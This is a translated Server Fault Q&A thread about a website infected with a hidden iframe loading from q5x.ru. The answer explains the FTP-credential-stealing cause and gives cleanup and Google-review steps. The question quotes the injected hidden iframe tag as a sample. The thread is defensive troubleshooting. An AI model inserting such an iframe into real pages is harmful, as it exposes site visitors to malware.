網站被隱藏的 iframe (q5x.ru) 攻擊

我的一個網站最近感染了某種涉及注入隱藏 iframe 的攻擊，它的來源來自一個網站 q5x.ru（請勿連結）。

Google搜尋並沒有幫助我弄清楚這次攻擊是如何發生的，所以我想知道你們中是否有人遇到過同樣的問題？

iframe 程式碼是這樣的：

<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>

根據要求，我正在執行一個帶有數據庫的 ASP.Net 網站，就表單而言，顯然是用於回發的 ASP.Net 表單。

我們最近在我們客戶的一個網站上遇到了同樣的問題。

此問題很可能是由主要針對 FTP 客戶端並蒐索主機名/使用者名/密碼組合的病毒感染引起的。找到後，將打開與 FTP 伺服器的連接，並蒐索 index.* 文件並將 iFrame 添加到其中。

在我們的特殊情況下，我們的客戶端是少數可以直接訪問 FTP 伺服器的客戶端之一。我們立即更改了密碼，恢復了文件的備份並刪除了我們客戶的 FTP 訪問權限。

您應該採取的步驟：

• 立即更改密碼
• 如果您有權訪問伺服器 FTP 日誌，請找出哪些文件已被感染
• 對於受感染的文件，我強烈建議手動恢復這些文件，預設情況下不要使用搜尋/替換。在大多數情況下，IFrame 會添加到文件末尾，但我也看到文件被部分刪除。

另請注意，如果Google 爬蟲在受感染時訪問您的網站，它會將您添加到惡意軟體列表中，這將嚴重影響您網站的聲譽。如果發生這種情況，請採取以下步驟：

1. 確保該站點不再包含受感染的文件
2. 確保您的網站已通過Google 網站管理員工具驗證
3. 使用 Google 網站管理員工具請求新網站審核

引用自：https://serverfault.com/questions/126238